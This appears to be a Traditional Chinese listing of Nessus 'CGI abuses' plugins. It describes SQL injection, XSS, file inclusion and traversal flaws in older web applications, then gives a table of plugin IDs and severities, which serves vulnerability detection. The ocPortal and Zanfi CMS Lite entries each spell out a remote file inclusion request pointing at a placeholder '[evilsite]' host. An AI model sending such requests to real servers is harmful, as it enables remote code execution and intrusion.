遠端主機正在使用 PowerPortal，這是一個以 PHP 編寫的內容管理系統。 

此產品的遠端版本中有一個弱點，可允許遠端攻擊者對遠端主機執行 SQL 注入攻擊。

攻擊者可利用此瑕疵，針對遠端資料庫執行任意 SQL 陳述式，並可能在遠端主機上執行任意命令。

已安裝指令碼 i-mall.cgi。此指令碼的某些版本容易受到遠端命令執行瑕疵影響，這是 i-mall.cgi 指令碼的「p」參數的使用者輸入清理不充分所致。
惡意使用者可透過此指令碼在遠端伺服器上傳遞任意 shell 命令。

遠端主機正在執行 CVSTrac，這是一個適用於 CVS 的 Web 型錯誤和修補程式集追蹤系統。

遠端主機正在執行 PostNuke，這是一個以 PHP 編寫的內容管理系統。

Postnuke 的開發已於 2008 年停止。不會修補安全性瑕疵。

遠端主機正在執行 eGroupWare，這是一種 Web 型群組軟體解決方案。

遠端主機正在執行 eGroupWare，這是一種 Web 型群組軟體解決方案。 

據報告， 1.0.0.006 版及更舊版本容易受到多個 SQL 注入和跨網站指令碼瑕疵影響。

遠端主機正在執行 SquirrelMail，這是一個以 PHP 編寫的 Web 郵件系統。

1.4.4 之前的 SquirrelMail 版本受到電子郵件 HTML 注入問題影響。遠端攻擊者可利用此瑕疵來取得使用者帳戶的存取權。

根據自我報告的版本號碼來判斷，遠端主機上正在執行的 Goollery 執行個體受到 viewpic.php 指令碼中多個跨網站指令碼 (XSS) 弱點影響。未經驗證的遠端攻擊者可惡意利用這些弱點，透過特製要求在使用者的瀏覽器工作階段內執行任意指令碼。

遠端 Web 伺服器上主控的 PhpGroupWare 版本有一個弱點，可允許遠端攻擊者透過「phpgw.inc.php」指令碼的「phpgw_info」參數執行任意命令，進而導致缺乏完整性。

已安裝「cgi.rb」CGI。有些版本容易遭受拒絕服務攻擊。

惡意使用者可藉由傳送特製的 HTTP POST 要求，強制遠端主機消耗大量 CPU 資源。

*** 警告：Nessus 僅相信存在此 *** CGI，並不能確定您的特定版本是否 *** 容易受到該問題影響。

遠端主機正在執行 PHP/FI。

此軟體的遠端版本在 mylog.html/mlog.html 檔案中有一個瑕疵，可允許遠端攻擊者檢視遠端主機上的任意檔案。

根據標題來判斷，遠端的 Mantis 版本受到數個資訊洩漏弱點的影響，可允許攻擊者檢視所有專案的統計資料，或在移除惡意使用者後接收專案的資訊。

遠端主機正在執行 IceWarp Web Mail，這是一個適用於 Microsoft Windows 平台的 Web 郵件解決方案。

此軟體的遠端版本容易受到多個輸入驗證問題影響，可允許攻擊者危害遠端主機的完整性。

遠端主機上正在執行的 Moodle 套件為 1.4.3 版之前版本。因此，會受到「glossary」模組中一個 SQL 插入弱點影響，這是因為缺少使用者輸入清理所致。

此外，據報告，Moodle 也受到目錄遊走和跨網站指令碼瑕疵影響。不過，Nessus 並未明確測試這些問題。

遠端 Web 伺服器中的 Gallery 版本可允許攻擊者透過不明向量注入任意 HTML 標籤。

遠端 Web 伺服器正在執行 Horde，這是 Horde Project 提供的一個 PHP 型應用程式架構。

根據版本號碼來判斷，遠端 Bugzilla Bug 追蹤系統容易受到任意命令執行瑕疵影響，這是應用程式未清理 process_bug.cgi 中使用者提供的資料所致。

遠端 Web 伺服器安裝有 _maincfgret CGI。某些版本容易受到緩衝區溢位弱點影響。請注意，Nessus 僅檢查是否存在此 CGI，並未嘗試判斷其是否有弱點。

根據版本號碼來判斷，遠端 Bugzilla Bug 追蹤系統容易受到多種瑕疵影響，攻擊者可利用這些瑕疵來繞過驗證或取得私人錯誤報告的存取權。

遠端 UBB.threads 版本中存在 SQL 注入問題，攻擊者可藉由傳送格式錯誤的值到「dosearch.php」檔案的「Name」引數，在遠端主機上執行任意 SQL 陳述式，並可能覆寫遠端系統中的任意檔案。

遠端主機正在執行 WowBB，這是一個以 PHP 編寫的 Web 論壇。 

根據版本來判斷，遠端安裝的 WowBB 為 1.61 版或更舊版本。這些版本容易遭受跨網站指令碼和 SQL 注入攻擊。惡意使用者可竊取使用者的 Cookie (包括驗證 Cookie)，並操控 SQL 查詢。

遠端主機正在執行 DevoyBB，這是一個以 PHP 編寫的 Web 論壇。 

安裝的版本容易受到 XSS 和 SQL 注入攻擊。惡意使用者可存取使用者的 Cookie (包括驗證 Cookie)，並注入要在基礎資料庫上執行的 SQL 命令。

遠端的 Serendipity 版本存在 HTTP 回應分割弱點，可允許攻擊者對遠端主機執行跨網站指令碼攻擊。

遠端主機上已安裝 nbmember.cgi。

此軟體的遠端版本容易受到資訊洩漏瑕疵影響，可允許攻擊者存取敏感的系統資訊，進而導致機密性喪失。

遠端主機正在執行 IdealBB，這是一個以 ASP 編寫的 Web 型佈告欄系統。

此軟體的遠端版本有多個瑕疵，包括 SQL 注入、跨網站指令碼和 HTTP 回應分割弱點。

遠端主機正在執行「Coppermine Gallery」，這是一組用來處理圖片集的 PHP 指令碼。

此產品有一個弱點，允許已停用 Cookie 的遠端攻擊者為某張圖片多次投票。

此外掛程式會判斷遠端 Web 伺服器上是否安裝了「Coppermine Photo Gallery」，並擷取所找到的任何執行個體的版本號碼和位置。

Coppermine 是一個以 PHP 編寫的開放原始碼 Web 型圖庫應用程式。

目標主機正在執行至少一個 Open WebMail 執行個體，其中的 userstat.pl 元件無法充分驗證使用者輸入。遠端攻擊者可利用此問題，使用 Web 伺服器運作權限在目標主機上執行任意程式。如需詳細資訊，請參閱：

  http://www.openwebmail.org/openwebmail/download/cert/advisories/SA-04:01.txt

遠端主機正在執行 CoolPHP 內容管理系統。

此軟體的遠端版本有多種瑕疵，可允許攻擊者讀取遠端主機上的任意檔案，或設定跨網站指令碼攻擊。

根據標題來判斷，遠端 phpMyAdmin 版本介於 2.5.0 和 2.6.0-pl1 之間。由於處理外部 MIME 型轉換的方式，這些版本可允許經驗證的遠端攻擊者執行需要 Web 伺服器權限的任意命令。 

請注意，若要成功攻擊，需要停用 PHP 的「safe_mode」，而且系統管理員不僅要準備特殊表格用於保留某些資訊，還要在組態中指定。

遠端主機似乎正在執行 BugPort，這是一個開放原始碼 Web 型系統，用於管理整個軟體開發過程中的工作和瑕疵。

此版本的 BugPort 有一個不明的附件處理瑕疵。

遠端主機正在執行 ocPortal，這是一個以 PHP 編寫的內容管理系統。

此軟體的遠端版本有一個錯誤，可允許攻擊者利用檔案「index.php」中的檔案包含錯誤，在遠端主機上執行任意命令。

攻擊者可透過以下要求執行任意命令：

  http://www.example.com/index.php?req_path=http://[evilsite]/

這會讓遠端指令碼在遠端網站上包含「funcs.php」檔案並執行。

遠端伺服器執行的 bBlog 是 0.7.4 版或更低版本，這是一個以 PHP 編寫並在 GPL 下發佈的部落格系統。 

此軟體的遠端版本受到指令碼「rss.php」中一個 SQL 注入攻擊弱點影響。造成此問題的原因在於，應用程式未正確清理使用者提供的輸入。 

攻擊者可利用此瑕疵在主機上執行任意 PHP 程式碼，或控制遠端資料庫。

遠端主機在執行 CactuShop，這是一個以 ASP 編寫的電子商務 Web 應用程式。

此軟體的遠端版本容易受到跨網站指令碼弱點影響，這是應用程式未清理「popuplargeimage.asp」指令碼中使用者提供的資料所致。

若成功攻擊此問題，攻擊者可以在有弱點的伺服器上執行惡意指令碼。 

此版本也可能容易受到指令碼「mailorder.asp」和「payonline.asp」中的 SQL 注入攻擊弱點影響。應用程式未篩選「strItems」參數的使用者輸入資料便將其用於 SQL 查詢。因此，攻擊者可透過格式錯誤的輸入來修改查詢。

攻擊者若成功利用此弱點，可在系統中執行命令 (透過 MS SQL 的 xp_cmdshell 函式)。

遠端主機正在執行 DUware 發佈的產品 - DUclassmate、DUclassified 或 DUforum。

此軟體的遠端版本有一個瑕疵，可允許攻擊者向 /admin/、messages.asp 或 messagesDetails.asp 的引數提供格式錯誤的值，進而在遠端主機上執行任意 SQL 陳述式。

此外，DUclassified 在訊息文字處理中存在跨網站指令碼弱點。DUclassmate 的 account.asp 中存在未經授權的密碼操控問題。

遠端主機正在執行 Zanfi CMS Lite，這是一個以 PHP 編寫的內容管理系統。 

此軟體的遠端版本有一個錯誤，可允許攻擊者利用檔案「index.php」中的檔案包含錯誤，在遠端主機上執行任意命令。 

攻擊者可透過以下要求執行任意命令：

  http://www.example.com/index.php?inc=http://[evilsite]/commands

這會讓遠端指令碼包含「commands.php」檔案並執行。

遠端主機正在執行 GoSmart 留言板，這是一個以 ASP 編寫的佈告欄管理員。

此軟體的遠端版本有多個瑕疵，這是應用程式未正確清理使用者提供的輸入所造成。

此外也受到跨網站指令碼弱點影響。因為此弱點，遠端攻擊者可能會建立含有指令碼的惡意連結，而該指令碼將在造訪時於不知情使用者的瀏覽器中執行。

此外，此版本也容易受到 SQL 注入攻擊瑕疵影響，允許攻擊者注入任意 SQL 命令。

遠端主機正在執行 BlackBoard Internet Newsboard System，這是一個開放原始碼 PHP 型網際網路佈告欄軟體應用程式。

此軟體的遠端版本容易受到 checkdb.inc.php 中的遠端檔案引入瑕疵影響，這是應用程式未清理「libpath」參數的使用者輸入資料所致。

若成功攻擊此問題，攻擊者可以在有弱點的伺服器上執行惡意指令碼。

*** Nessus 僅使用收集到的資訊
*** 報告此弱點。因此，
 ***這可能為誤報。

根據標題來判斷，遠端 WordPress 版本容易遭受 HTTP 分割攻擊，攻擊者可插入 CR LF 字元，然後引誘不知情的使用者存取 URL。用戶端會剖析攻擊者提供的次要標頭，並可能對其採取行動。

遠端 CubeCart 版本中存在 SQL 注入問題，攻擊者可藉由傳送格式錯誤的值到「index.php」檔案的「cat_id」引數，在遠端主機上執行任意 SQL 陳述式，並可能覆寫遠端系統中的任意檔案。

遠端主機正在執行 w-agora，這是一個以 PHP 編寫的 Web 型論壇應用程式。

此軟體的遠端版本容易遭受目錄遊走攻擊。遠端攻擊者可傳送特製的 URL，以 Web 伺服器處理程序的權限從遠端系統讀取任意檔案。

遠端主機執行的 PHP 版本比 5.0.2 或 4.39 舊。

此軟體的遠端版本受到 PHP_Variables 中記憶體洩漏弱點的影響。攻擊者可能惡意利用此瑕疵，從遠端讀取遠端主機上 httpd 處理程序的部分記憶體。

遠端主機上安裝的 PHP-Fusion 版本有一個弱點，可允許經驗證的攻擊者注入任意 SQL 程式碼，這是應用程式不當驗證「members.php」指令碼的「rowstart」參數以及「comments_php」指令碼的「comment_id」參數的使用者輸入造成。

此外，此軟體版本也包含數個跨網站指令碼問題以及一個資訊洩漏弱，但 Nessus 尚未測試這些問題。

遠端主機正在執行 Silent-Storm，這是一個以 PHP 編寫的 Web 型論壇管理軟體。

此軟體的遠端版本有多個輸入驗證瑕疵：

  - 有一個與「index.php」指令碼的「module」參數有關的跨網站指令碼弱點。

  - 應用程式無法清理「profile.php」指令碼的「mail」參數，攻擊者可濫用此問題來向「users.dat」資料庫檔案注入任意資料，並取得應用程式的管理存取權等。

遠端主機正在執行 w-agora，這是一個以 PHP 編寫的 Web 型論壇管理軟體。

此軟體的遠端版本有多個輸入驗證瑕疵：

  - 「redir_url.php」檔案中有一個 SQL 注入攻擊弱點，可允許攻擊者在遠端資料庫中執行任意 SQL 陳述式；

  - 存在跨網站指令碼問題，可允許攻擊者藉由傳送格式錯誤的連結，竊取遠端網站合法使用者的 Cookie；

  - 存在 HTTP 回應分割弱點，可允許攻擊者對遠端主機執行跨網站指令碼攻擊。

遠端伺服器執行的 Icecast 是 1.3.12 之前版本，這是一個開放原始碼的串流音訊伺服器。

此版本受到遠端緩衝區溢位弱點影響，這是因為它未正確檢查從用戶端傳送的資料邊界。 

由於此弱點，遠端攻擊者可能造成堆疊溢位，然後以伺服器的權限執行任意程式碼。

*** Nessus 僅使用收集到的資訊
*** 報告此弱點。

遠端伺服器執行的 Icecast 是 1.3.10 版或更舊版本，這是一個開放原始碼的串流音訊伺服器。

這些版本受到目錄遊走瑕疵影響，這是因為應用程式無法正確清理使用者提供的輸入。

攻擊者可藉由傳送特製的 URL 要求來檢視系統上的任意檔案。

*** Nessus 僅使用收集到的資訊
*** 報告此弱點。

遠端主機正在執行 Vignette 應用程式入口網站，這是一個商用入口網站套件。

此軟體的遠端版本存在資訊洩漏弱點。攻擊者可要求診斷公用程式，進而透過要求 /portal/diag/ 來洩漏有關遠端網站的資訊。

由於應用程式無法正確清理使用者提供的輸入，遠端 Serendipity 版本容易受到 SQL 注入問題影響。

攻擊者可利用此瑕疵，在遠端資料庫中發出任意陳述式，進而繞過授權，甚或覆寫遠端系統上的任意檔案

此外，comment.php 指令碼容易遭受跨網站指令碼攻擊。

ID	名稱	嚴重性
15760	PowerPortal index.php index_page 參數 SQL 注入攻擊	high
15750	Webman I-Mall i-mall.cgi 任意命令執行	critical
15722	CVSTrac 偵測	info
15721	PostNuke 偵測	high
15720	eGroupWare 偵測	info
15719	EGroupWare 多個弱點 (SQLi、ID)	high
15718	SquirrelMail decodeHeader 任意 HTML 注入	medium
15717	Goollery < 0.04b 多個弱點	medium
15711	phpGroupWare phpgw.inc.php phpgw_info 參數遠端檔案引入	critical
15710	Ruby cgi.rb 格式錯誤的 HTTP 要求 CPU 使用率 DoS	medium
15708	PHP < 3.0 mylog.html/mlog.html 任意檔案存取	medium
15651	Mantis < 0.19.1 多個弱點	medium
15643	IceWarp Web Mail 多個瑕疵 (2)	medium
15639	Moodle < 1.4.3 多個弱點	high
15624	Gallery 不明的 HTML 注入弱點	medium
15604	Horde 軟體偵測	info
15565	Bugzilla 多個遠端命令執行	high
15564	Ipswitch WhatsUp Gold _maincfgret.cgi 遠端溢位	high
15562	Bugzilla < 2.16.7 / 2.18.0rc3 多個資訊洩漏弱點	medium
15561	UBB.threads dosearch.php SQL 注入攻擊	high
15557	WowBB <= 1.61 多個弱點	high
15556	DevoyBB 多個遠端弱點 (SQLi、XSS)	high
15543	Serendipity 多個指令碼 HTTP 回應分割	medium
15542	Netbilling nbmember.cgi cmd 參數資訊洩漏	medium
15541	IdealBB 多個弱點 (XSS、SQLi 等)	medium
15531	Coppermine Photo Gallery 投票限制繞過	medium
15530	Coppermine Photo Gallery 偵測	info
15529	Open WebMail userstat.pl 任意命令執行	high
15506	CoolPHP 1.0 多個弱點	medium
15478	phpMyAdmin < 2.6.0-pl2 不明的任意命令執行弱點	medium
15470	BugPort 附加檔案處理不明問題	high
15469	IceWarp Web Mail 多個瑕疵 (1)	high
15468	ocPortal index.php req_path 參數遠端檔案引入	high
15466	bBlog rss.php p 參數 SQL 注入攻擊	high
15461	CactuShop 5.x 多個遠端弱點 (XSS、SQLi)	high
15453	DUware 產品多個遠端弱點 (SQLi、XSS)	high
15452	Zanfi CMS Lite index.php inc 參數遠端檔案引入	high
15451	GoSmart 留言板多個弱點 (SQLi、XSS)	high
15450	BlackBoard Internet Newsboard System checkdb.inc.php libpath 參數遠端檔案引入	high
15443	WordPress「wp-login.php」HTTP 回應分割	medium
15442	CubeCart index.php cat_id 參數 SQL 注入攻擊	high
15437	w-Agora 多個指令碼遊走任意檔案存取	medium
15436	PHP php_variables.c 多個變動不成對括號記憶體洩漏	medium
15433	PHP-Fusion 4.01 多個弱點	medium
15403	Silent-Storm 入口網站多個輸入驗證弱點	high
15402	w-Agora 4.1.6a 多個輸入驗證弱點	high
15401	Icecast MP3 用戶端 HTTP GET 要求遠端溢位	high
15396	Icecast Encoded 遊走任意檔案存取	medium
14847	Vignette 應用程式入口網站診斷公用程式資訊洩漏	medium
14842	Serendipity < 0.7.0beta3 多個弱點	high

偵測

Nessus 的 CGI abuses 系列

high

critical

info

high

info

high

medium

medium

critical

medium

medium

medium

medium

high

medium

info

high

high

medium

high

high

high

medium

medium

medium

medium

info

high

medium

medium

high

high

high

high

high

high

high

high

high

medium

high

medium

medium

medium

high

high

high

medium

medium

high